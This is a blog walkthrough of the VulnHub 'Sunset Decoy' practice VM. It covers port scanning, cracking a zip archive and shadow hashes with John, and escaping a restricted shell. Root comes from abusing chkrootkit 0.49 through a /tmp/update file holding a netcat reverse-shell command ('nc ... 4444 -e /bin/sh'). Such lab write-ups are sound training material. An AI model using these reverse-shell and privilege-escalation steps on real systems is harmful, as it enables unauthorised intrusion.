Address
304 North Cardinal St.
Dorchester Center, MA 02124
Work Hours
Monday to Friday: 7AM - 7PM
Weekend: 10AM - 5PM
The next VM that I completed on stream was VulnHub Sunset Decoy.
VulnHub Sunset Decoy Walkthrough – Introduction
To continue with my VulnHub solves, I moved on to the Sunset Decoy VM, my first foray into whitecr0wz VM series.
You can find the VM here, and it was easy.
YouTube Version of this Post
If you prefer video and audio over just reading the text, then you can find the YouTube version of this post below.
That said, don’t forget to hit those like and subscribe buttons to help support the blog and channel!
Enumeration
First, I swept my entire network, and found the IP address of my target box.
Nmap scan report for 192.168.5.227 Host is up (0.00049s latency). MAC Address: 08:00:27:DB:9C:02 (Oracle VirtualBox virtual NIC)
Next, I scanned any open ports on the target, and found 22 and 80 were listening.
kali@kali:~/VulnHub/decoy$ sudo nmap -A 192.168.5.227 Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-24 20:21 EDT Nmap scan report for 192.168.5.227 Host is up (0.00028s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 a9:b5:3e:3b:e3:74:e4:ff:b6:d5:9f:f1:81:e7:a4:4f (RSA) | 256 ce:f3:b3:e7:0e:90:e2:64:ac:8d:87:0f:15:88:aa:5f (ECDSA) |_ 256 66:a9:80:91:f3:d8:4b:0a:69:b0:00:22:9f:3c:4c:5a (ED25519) 80/tcp open http Apache httpd 2.4.38 | http-ls: Volume / | SIZE TIME FILENAME | 3.0K 2020-07-07 16:36 save.zip |_ |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Index of / MAC Address: 08:00:27:DB:9C:02 (Oracle VirtualBox virtual NIC) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=9/24%OT=22%CT=1%CU=30997%PV=Y%DS=1%DC=D%G=Y%M=080027%T OS:M=5F6D3818%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10A%TI=Z%CI=Z%II=I OS:%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O OS:5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6 OS:=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD= OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0% OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1( OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI= OS:N%T=40%CD=S) Network Distance: 1 hop Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.28 ms 192.168.5.227 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 20.74 seconds
When I visited the target on port 80, the server prompted me to download a zip archive.
kali@kali:~/VulnHub/decoy$ mv ~/Downloads/save.zip . kali@kali:~/VulnHub/decoy$ unzip save.zip Archive: save.zip [save.zip] etc/passwd password: kali@kali:~/VulnHub/decoy$ ls save.zip
Password Cracking
First, with the archive downloaded, I extracted the zip hash using zip2john.
kali@kali:~/VulnHub/decoy$ sudo zip2john save.zip ver 2.0 efh 5455 efh 7875 save.zip/etc/passwd PKZIP Encr: 2b chk, TS_chk, cmplen=668, decmplen=1807, crc=B3ACDAFE ver 2.0 efh 5455 efh 7875 save.zip/etc/shadow PKZIP Encr: 2b chk, TS_chk, cmplen=434, decmplen=1111, crc=E11EC139 ver 2.0 efh 5455 efh 7875 save.zip/etc/group PKZIP Encr: 2b chk, TS_chk, cmplen=460, decmplen=829, crc=A1F81C08 ver 2.0 efh 5455 efh 7875 save.zip/etc/sudoers PKZIP Encr: 2b chk, TS_chk, cmplen=368, decmplen=669, crc=FF05389F ver 2.0 efh 5455 efh 7875 save.zip/etc/hosts PKZIP Encr: 2b chk, TS_chk, cmplen=140, decmplen=185, crc=DFB905CD ver 1.0 efh 5455 efh 7875 save.zip/etc/hostname PKZIP Encr: 2b chk, TS_chk, cmplen=45, decmplen=33, crc=D9C379A9 save.zip:$pkzip2$3*2*1*0*8*24*a1f8*8d07*7d51a96d3e3fa4083bbfbe90ee97ddba1f39f769fcf1b2b6fd573fdca8c97dbec5bc9841*1*0*8*24*b3ac*90ab*f7fe58aeaaa3c46c54524ee024bd38dae36f3110a07f1e7aba266acbf8b5ff0caf42e05e*2*0*2d*21*d9c379a9*9b9*46*0*2d*d9c3*8ce8*aae40dfa55b72fd591a639c8c6d35b8cabd267f7edacb40a6ddf1285907b062c99ec6cc8b55d9f0027f553a44f*$/pkzip2$::save.zip:etc/hostname, etc/group, etc/passwd:save.zip NOTE: It is assumed that all files in each archive have the same password. If that is not the case, the hash may be uncrackable. To avoid this, use option -o to pick a file at a time.
Next, using John, I was able to crack the encrypted archive’s password of “manuel”.
kali@kali:~/VulnHub/decoy$ sudo john hash.txt Using default input encoding: UTF-8 Loaded 1 password hash (PKZIP [32/64]) Will run 2 OpenMP threads Proceeding with single, rules:Single Press 'q' or Ctrl-C to abort, almost any other key for status Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance. Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance. Almost done: Processing the remaining buffered candidate passwords, if any. Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance. Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist manuel (save.zip) 1g 0:00:00:00 DONE 2/3 (2020-09-24 20:26) 9.090g/s 658445p/s 658445c/s 658445C/s 123456..Peter Use the "--show" option to display all of the cracked passwords reliably Session completed
When I extracted the zip archive, I obtained a few files from the target’s etc folder.
kali@kali:~/VulnHub/decoy$ unzip save.zip Archive: save.zip [save.zip] etc/passwd password: inflating: etc/passwd inflating: etc/shadow inflating: etc/group inflating: etc/sudoers inflating: etc/hosts extracting: etc/hostname
The group file showed a group that looked like an MD5 hash, but this seemed to lead nowhere.
kali@kali:~/VulnHub/decoy/etc$ tail -1 group 296640a3b825115a47b68fc44501c828:x:1000:
This same hash was a username on the box, that had login privileges to a restricted shell.
kali@kali:~/VulnHub/decoy/etc$ tail -1 passwd 296640a3b825115a47b68fc44501c828:x:1000:1000:,,,:/home/296640a3b825115a47b68fc44501c828:/bin/rbash
When I looked at the shadow file, I found 2 potential user hashes to crack.
root:$6$RucK3DjUUM8TjzYJ$x2etp95bJSiZy6WoJmTd7UomydMfNjo97Heu8nAob9Tji4xzWSzeE0Z2NekZhsyCaA7y/wbzI.2A2xIL/uXV9.:18450:0:99999:7::: daemon:*:18440:0:99999:7::: bin:*:18440:0:99999:7::: sys:*:18440:0:99999:7::: ... <snip> ... colord:*:18440:0:99999:7::: hplip:*:18440:0:99999:7::: systemd-coredump:!!:18440:::::: 296640a3b825115a47b68fc44501c828:$6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7x2BjKPdir2Fuc9XRRJEk9FNdPliX4Nr92aWzAtykKih5PX39OKCvJZV0us.:18450:0:99999:7:::
Again, using John, I was able to crack the hash for the ‘296640a3b825115a47b68fc44501c828’ user.
kali@kali:~/VulnHub/decoy$ sudo john user-hashes.txt [sudo] password for kali: Using default input encoding: UTF-8 Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x]) Cost 1 (iteration count) is 5000 for all loaded hashes Will run 2 OpenMP threads Proceeding with single, rules:Single Press 'q' or Ctrl-C to abort, almost any other key for status Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance. Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance. Warning: Only 6 candidates buffered for the current salt, minimum 8 needed for performance. Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance. Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance. Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance. Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance. Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance. Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance. Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance. Further messages of this type will be suppressed. To see less of these warnings, enable 'RelaxKPCWarningCheck' in john.conf Almost done: Processing the remaining buffered candidate passwords, if any. Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist server (296640a3b825115a47b68fc44501c828)
Initial Foothold
With the cracked user hash, I SSHed into the box, and had my initial foothold.
kali@kali:~/VulnHub/decoy$ ssh [email protected] The authenticity of host '192.168.5.227 (192.168.5.227)' can't be established. ECDSA key fingerprint is SHA256:XcSxTQWk9o60DynaXNIL8HbB93NqEyqofs1B2EORdEE. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.5.227' (ECDSA) to the list of known hosts. [email protected]'s password: Linux 60832e9f188106ec5bcc4eb7709ce592 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Tue Jul 7 16:45:50 2020 from 192.168.1.162 -rbash: dircolors: command not found 296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ id uid=1000(296640a3b825115a47b68fc44501c828) gid=1000(296640a3b825115a47b68fc44501c828) groups=1000(296640a3b825115a47b68fc44501c828)
Just like the Funbox solve, I had to escape my RBash environment.
kali@kali:~/VulnHub/decoy$ ssh [email protected] -t "bash --noprofile" [email protected]'s password: bash: dircolors: command not found 296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ cat user.txt bash: cat: command not found
When I used the full path to the binary, I was able to obtain the user level hash!
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ /usr/bin/cat user.txt 35253d886842075b2c6390f35946e41f
Finally, I found a honeypot.decoy file application that seemed to be a fake administrative console for a honey pot on the target system.
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy -------------------------------------------------- Welcome to the Honey Pot administration manager (HPAM). Please select an option. 1 Date. 2 Calendar. 3 Shutdown. 4 Reboot. 5 Launch an AV Scan. 6 Check /etc/passwd. 7 Leave a note. 8 Check all services status. Option selected:1 Thu 24 Sep 2020 08:35:40 PM EDT -------------------------------------------------- 296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy -------------------------------------------------- Welcome to the Honey Pot administration manager (HPAM). Please select an option. 1 Date. 2 Calendar. 3 Shutdown. 4 Reboot. 5 Launch an AV Scan. 6 Check /etc/passwd. 7 Leave a note. 8 Check all services status. Option selected:3 Shutdown is currently not available due to not enough privileges. Ending program. -------------------------------------------------- 296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy -------------------------------------------------- Welcome to the Honey Pot administration manager (HPAM). Please select an option. 1 Date. 2 Calendar. 3 Shutdown. 4 Reboot. 5 Launch an AV Scan. 6 Check /etc/passwd. 7 Leave a note. 8 Check all services status. Option selected:5 The AV Scan will be launched in a minute or less. -------------------------------------------------- 296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy -------------------------------------------------- Welcome to the Honey Pot administration manager (HPAM). Please select an option. 1 Date. 2 Calendar. 3 Shutdown. 4 Reboot. 5 Launch an AV Scan. 6 Check /etc/passwd. 7 Leave a note. 8 Check all services status. Option selected:8 /usr/sbin/service: 1: /usr/sbin/service: basename: not found /usr/sbin/service: 1: /usr/sbin/service: basename: not found /usr/sbin/service: 169: /usr/sbin/service: systemctl: not found /usr/sbin/service: 175: exec: systemctl: not found --------------------------------------------------
Privilege Escalation
While looking around the user’s home directory, I also found output from a pspy run.
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
�-��-��-"�-��-��-� �-��-��-��-��-��-� �-��-��-"�-��-��-� �-"�-��-� �-��-��-"
�-"�-��-��-' �-��-��-'�-'�-��-� �-' �-"�-��-��-' �-��-��-'�-'�-��-� �-��-��-'
�-"�-��-��-' �-��-��-"�-'�-' �-"�-��-��-� �-"�-��-��-' �-��-��-"�-' �-'�-��-� �-��-��-'
�-'�-��-��-��-��-"�-' �-' �-' �-��-��-'�-'�-��-��-��-��-"�-' �-' �-' �-��-��-��-"�-'
�-'�-��-��-' �-' �-'�-'�-��-��-��-��-��-��-'�-'�-'�-��-��-' �-' �-' �-' �-��-��-'�-"�-'
�-'�-"�-'�-' �-' �-'�-' �-'�-"�-' �-' �-'�-'�-"�-'�-' �-' �-' �-��-��-'�-'�-'
�-'�-' �-' �-' �-'�-' �-' �-'�-'�-' �-' �-"�-��-� �-'�-'�-'
�-'�-' �-' �-' �-' �-'�-' �-' �-' �-'�-'
�-' �-' �-'
�-' �-'
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2020/06/27 18:56:57 CMD: UID=0 PID=9 |
2020/06/27 18:56:57 CMD: UID=0 PID=8 |
2020/06/27 18:56:57 CMD: UID=1000 PID=7659 | /bin/bash
2020/06/27 18:56:57 CMD: UID=1000 PID=7658 | python -c import pty;pty.spawn('/bin/bash')
2020/06/27 18:56:57 CMD: UID=1000 PID=7657 | /bin/sh -i
2020/06/27 18:56:57 CMD: UID=1000 PID=7653 | sh -c uname -a; w; id; /bin/sh -i
2020/06/27 18:56:57 CMD: UID=1000 PID=7652 | php -S 0.0.0.0:8080
... <snip> ...
2020/06/27 18:56:57 CMD: UID=0 PID=104 |
2020/06/27 18:56:57 CMD: UID=0 PID=102 |
2020/06/27 18:56:57 CMD: UID=0 PID=10 |
2020/06/27 18:56:57 CMD: UID=0 PID=1 | /sbin/init
2020/06/27 18:56:58 CMD: UID=0 PID=12385 | -bash
2020/06/27 18:56:58 CMD: UID=0 PID=12386 | tar -xvzf chkrootkit-0.49.tar.gz
2020/06/27 18:57:04 CMD: UID=0 PID=12389 | -bash
2020/06/27 18:57:04 CMD: UID=0 PID=12390 | -bash
2020/06/27 18:57:04 CMD: UID=0 PID=12391 | -bash
2020/06/27 18:57:05 CMD: UID=0 PID=12392 | -bash
2020/06/27 18:57:05 CMD: UID=0 PID=12393 | -bash
2020/06/27 18:57:06 CMD: UID=0 PID=12394 | -bash
2020/06/27 18:57:06 CMD: UID=0 PID=12395 | -bash
2020/06/27 18:57:06 CMD: UID=0 PID=12396 | -bash
2020/06/27 18:57:06 CMD: UID=0 PID=12397 | -bash
2020/06/27 18:57:06 CMD: UID=0 PID=12398 | -bash
2020/06/27 18:57:06 CMD: UID=0 PID=12399 | -bash
2020/06/27 18:57:07 CMD: UID=0 PID=12400 | -bash
2020/06/27 18:57:07 CMD: UID=0 PID=12401 | -bash
2020/06/27 18:57:07 CMD: UID=0 PID=12402 | -bash
2020/06/27 18:57:07 CMD: UID=0 PID=12403 | -bash
Exiting program... (interrupt)
Wondering if the chkrootkit binary was being run by the honey put, I selected the “AV Scan” option again.
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy -------------------------------------------------- Welcome to the Honey Pot administration manager (HPAM). Please select an option. 1 Date. 2 Calendar. 3 Shutdown. 4 Reboot. 5 Launch an AV Scan. 6 Check /etc/passwd. 7 Leave a note. 8 Check all services status. Option selected:5 The AV Scan will be launched in a minute or less. --------------------------------------------------
As expected, the chkrootkit binary was being run when the AV option was selected.
root 4932 0.0 0.0 2388 756 ? Ss 20:41 0:00 /bin/sh -c /bin/bash /root/scrip root 4933 0.0 0.3 6644 3064 ? S 20:41 0:00 /bin/bash /root/script.sh root 4934 3.0 0.1 2676 1936 ? S 20:41 0:00 /bin/sh /root/chkrootkit-0.49/ch 296640a+ 5307 0.0 0.3 10632 3120 pts/0 R+ 20:41 0:00 /usr/bin/ps aux
After a bit of research, I found a potential chkrootkit exploit for privilege escalation.
Before going any further I tested the nc binary, to make sure that a reverse connection could be made.
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ /usr/bin/nc 192.168.5.228 4444 -e /bin/sh ^C
My attacker machine caught the shell, so I knew that I’d be able proceed further.
listening on [any] 4444 ... 192.168.5.227: inverse host lookup failed: Unknown host connect to [192.168.5.228] from (UNKNOWN) [192.168.5.227] 54192 id uid=1000(296640a3b825115a47b68fc44501c828) gid=1000(296640a3b825115a47b68fc44501c828) groups=1000(296640a3b825115a47b68fc44501c828)
Following the exploit steps, I created a malicious update file in the tmp directory.
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ echo '/usr/bin/nc 192.168.5.228 4444 -e /bin/sh' > /tmp/update 296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ /usr/bin/chmod +x /tmp/update
When I executed the AV scan, my attacker machine got a connection from the target, and I had a root shell!
kali@kali:~/VulnHub/decoy$ nc -lvp 4444 listening on [any] 4444 ... 192.168.5.227: inverse host lookup failed: Unknown host connect to [192.168.5.228] from (UNKNOWN) [192.168.5.227] 54194 id uid=0(root) gid=0(root) groups=0(root)
When I looked at the script.sh file, it was executing the chkrootkit binary as expected, and mentioned the AV scan.
cat script.sh FILE=/dev/shm/STTY5246 if test -f "$FILE"; then /root/chkrootkit-0.49/chkrootkit else echo "An AV scan will not be launched." fi
Finally, I grabbed the root flag, and completed the VM!
cat root.txt ........::::::::::::.. .......|...............::::::::........ .:::::;;;;;;;;;;;:::::.... . \ | ../....::::;;;;:::::....... . ........... / \\_ \ | / ...... . ........./\ ...:::../\\_ ...... ..._/' \\\_ \###/ /\_ .../ \_....... _// .::::./ \\\ _ .../\ /' \\\\#######// \/\ // \_ ....//// _/ \\\\ _/ \\\ / x \\\\###//// \//// \__ _///// ./ x \\\/ \/ x X \////// \///// / XxX \\/ XxX X //// x -----XxX-------------|-------XxX-----------*--------|---*-----|------------X-- X _X * X ** ** x ** * X _X _X x * x X_ 1c203242ab4b4509233ca210d50d2cc5 Thanks for playing! - Felipe Winsnes (@whitecr0wz)
Video Highlight
If you’d rather watch the stream highlight rather than read all this text, then you can find it here.
To catch me live, be sure to follow me on Twitch!
VulnHub Sunset Decoy Walkthrough – Conclusion
This was my first VM by whitecr0wz, and it was a fun one.
I still plan on making a ton of posts but let me know if these VulnHub write-ups get repetitive.
Other than that, let me know if you have any ideas for what else I should stream!
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he’s done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!
He currently serves as a Senior Staff Adversarial Engineer for Avalara, and his previous position was a Principal Penetration Testing Consultant for Secureworks.
This page contains links to products that I may receive compensation from at no additional cost to you. View my Affiliate Disclosure page here. As an Amazon Associate, I earn from qualifying purchases.
One comment
Leave a Reply
This site uses Akismet to reduce spam. Learn how your comment data is processed.
[…] like my last post, I’m continuing with my string of VulnHub […]